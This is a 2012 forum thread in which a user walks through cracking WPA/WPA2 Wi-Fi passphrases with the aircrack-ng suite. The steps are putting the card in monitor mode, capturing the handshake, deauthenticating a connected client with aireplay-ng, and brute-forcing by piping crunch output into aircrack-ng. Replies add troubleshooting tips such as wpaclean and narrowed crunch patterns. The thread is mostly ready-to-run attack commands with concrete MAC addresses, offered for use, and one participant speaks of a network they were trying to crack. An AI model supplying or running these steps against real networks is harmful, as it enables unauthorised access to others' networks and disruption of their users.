Crunch & Aircrack-ng to Avoid Wordlists

Discussion in 'Dictionary, Password & Wordlists' started by mrmanuelmtz, 29 Aug 2012.

  1. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    35
    Well, this post is because I am tired of these dictionary files that are constantly increasing in size, to the point where they cease to be portable, so instead of buy a higher capacity USB memory. I decided to do some research and I think this is a great option to use as a last resort as this is a brute force method.

    so as the post says. the programs to use are the aircrack-ng suite and crunch

    That said... :dance

    first we put our wireless card on monitor mode: (open Root Shell Window)
    Code:
    Select All
    airmon-ng start wlan0 airodump-ng mon0, (or ath1, or ...)
    Other Linux 2.4.x kernel-2012-08-24-00-39-01.png
    • the card will start listen to networks, wait 'till your essid appear which has to be WPA or WPA2 encoded
    Other Linux 2.4.x kernel-2012-08-24-00-39-40.png
    • mine is INFINITUMCBA277 so select yours
    • now that you have the MAC address and the ch#
    Code:
    Select All
    airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0
    • it should look like this:
    Code:
    Select All
    airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0
    Other Linux 2.4.x kernel-2012-08-24-00-51-02.png
    • so now we wait forever for a handshake or we can deauthenticate a client to obtain a handshake
    • in order to do that we must have the MAC of the client:
    Code:
    Select All
    aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0
    • it should look like this:
    Code:
    Select All
    aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70: D4:F2:91:AE:67 mon0
    Other Linux 2.4.x kernel-2012-08-24-00-56-27.png
    • once the user is deauthenticated and reconnect we'll obtain the handshake
    • if the command didn't work, well... try again (if after u did the deauthenticate command noting seems to happend... maybe you are too far from the client 'cause this command goes directly to the client's connection.) :(
    • you will see something like: WPA handshake 58:98:35:CB:A2:77
    Other Linux 2.4.x kernel-2012-08-24-18-09-34.png
    • so now we use crunch
    • we wil use the *.cap file were the handshake was saved
    Other Linux 2.4.x kernel-2012-08-24-18-35-12.png
    • usually in Xiaopan OS is in /home/tc/
    • so the syntaxis is:
    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w -
    • it should look like this:
    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    Other Linux 2.4.x kernel-2012-08-24-20-04-15.png
    Then you just have to wait for crunch and aircrack-ng to verify each combination.

    i highlight the last command because i want to explain it so you can adapt the program to your needs:

    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    • So we start with the first instruction: crunch is the wordlist generator :pcrunch 8 8
      • crunch 8 8
    • Second: the '8 8' is for the length of the word in characters, the first '8' indicates starting length and the second '8' the ending length. So if you want to test your security with 16 characters password you can change to '16 16,' or '8 16.'
      • crunch 8 8 0123456789
    • Third: '0123456789' this is the list of characters to include in the wordlist for a numeric password. note: 75 % of users use numeric passwords. but you can also try something like: '01234567890abcdefghijklf' by using an alphanumeric wordlist the time will increase as this is a brute force method.
      • 0123456789 | aircrack-ng
    • Fourth: this symbol is very important --> | <-- as it indicates the end of instructions for crunch and the new instructions for aircrack-ng.
    • Last but not least: the place were the .cap file is has to be accurate :idea
    Well there's a lot of program that do things like this, i just like it better to do it by myself :D. Well this is it, let me know if you find this post useful :dance
     
    • Like Like x 16
    • Informative Informative x 5
    • Winner Winner x 1
  2. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member VIP Admin

    Joined:
    18 May 2012
    Messages:
    3,093
    Likes Received:
    1,268
    Really impressive, I think that this would interest hazz death quite a lot.
     
    • Like Like x 1
    • Agree Agree x 1
    • Winner Winner x 1
  3. hazz death

    hazz death Well-Known Member
    Dev Team VIP

    Joined:
    19 Jun 2012
    Messages:
    101
    Likes Received:
    86
    thanks for tagging me, yes, it realy impressive! :D thanks for sharing mrmanuelmtz
     
    • Like Like x 1
  4. ihack

    ihack Member

    Joined:
    8 Oct 2012
    Messages:
    2
    Likes Received:
    1
    Just curios the the wifi that i was trying to crack had CCMP cipher, so my question is if it is possible to crack a network with a CCMP cipher using the above method or does it have to be a WEP or TKIP cipher
     
    • Like Like x 1
  5. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    35

    Well this method is for wpa/wpa2 networks so CCMP cipher is still a wpa/wpa2, just remember that this method is a bruteforce so if you are looking forward to have a more secure network, if your router supports it, set it to
    only beacon once a second - that should
    deter anyone trying to Bruteforce.
     
    • Like Like x 1
  6. easy1

    easy1 Member

    Joined:
    8 Oct 2012
    Messages:
    11
    Likes Received:
    1
     
    • Funny Funny x 1
  7. nonameinthenet

    Joined:
    15 Oct 2012
    Messages:
    3
    Likes Received:
    1
    Thanks 4 d guide., ill try this..
     
    • Like Like x 1
  8. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    80
    let me see if i am on the same page... when u look and say crunch and type the letters it makes the list for? so crunch 8 8 abc
    will make a 8 letter word only useing those 3 letters ? or did i mis read something
     
    • Like Like x 1
  9. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    257
    Likes Received:
    122
    • Like Like x 1
  10. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    80
    how fast is this the same as a dic file or faster? i am currently hashing a 40 gig file ... i have another 27 gig dic file... if this is faster i much pref this also can you do a bt (gnome) walkthough on it or is it the same thing
     
    • Like Like x 1
  11. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    35
    :yes A= yes that's exactly how it works, but for a 3 letters combination u don't need a program :)
     
    • Like Like x 1
  12. tuyhin

    tuyhin Member

    Joined:
    30 Aug 2012
    Messages:
    1
    Likes Received:
    0
    how to type --> | <--
     
    • Funny Funny x 1
  13. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    80
    thank you that was informative i will try that later i will have to do all letters and numbers tho XD i have a HUGE password
    --- Double Post Merged, 19 Nov 2012 ---
    @ mrmanuelmtz, alt+179 = │
     
    • Like Like x 1
  14. estimacamry

    estimacamry Tracker
    VIP

    Joined:
    3 Aug 2012
    Messages:
    556
    Likes Received:
    169
    Guys,
    I manage to create word list with Crunch. My pass phrase abkcmtshab. In order to shorten my pentest time I use
    /pentest/passwords/crunch/./crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt>
    The lists is only 1mb. After 4way handshake started aircrack. Final results : Passphrase not in dictionary!
    How could this be? I've double check to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain:(
    Problem solved after running wpaclean on my cap file:joy
     
    • Like Like x 1
    • Informative Informative x 1
  15. x_mony

    x_mony Guest

    Hi mrmanuelmtz i like your idea of crunch and aircrack instead of wordlist but i'm not knowing when are you opening a new root shell each time can u specify me when do you open a new root shell? And where should the handshake appear please specify this to me also.and hey thanks very much in advance
     
    • Like Like x 1
  16. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    257
    Likes Received:
    122
    | is on top of "enter" key under "backspace" key same key where \ backslash is at..shift + \ will give you |
     
    • Like Like x 1
  17. x_mony

    x_mony Guest

    Aircrack started trying the pins and everything worked fine but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combination
    --- Double Post Merged, 12 Dec 2012 ---
    Hi mrmanuelmtz your method worked with my ralink just wondering does it work with the built in wifi of the laptop?thanks in advance
     
    • Like Like x 1
  18. estimacamry

    estimacamry Tracker
    VIP

    Joined:
    3 Aug 2012
    Messages:
    556
    Likes Received:
    169
    x_mony
    Clean up your cap file before starting aircrack
    Code:
    Select All
    wpaclean <out.cap> <in.cap>
     
    • Like Like x 1
    • Informative Informative x 1
  19. x_mony

    x_mony Guest

    thnx for the reply
    --- Double Post Merged, 9 Jan 2013 ---
    hi mrmanuelmtz said :"Well there's a lot of program that do things like this, i just like it better to do it by myself :D."does anyone know a program that uses crunch and aircrack-ng automatically without the need of writing all these commands? and thanks in advance
     
    • Agree Agree x 1
  20. epitomize

    epitomize Active Member

    Joined:
    26 Oct 2012
    Messages:
    9
    Likes Received:
    5
    can put the crunch on minidwep?.. ~_~




    { hoho }
     
    • Like Like x 3

Share This Page

Loading...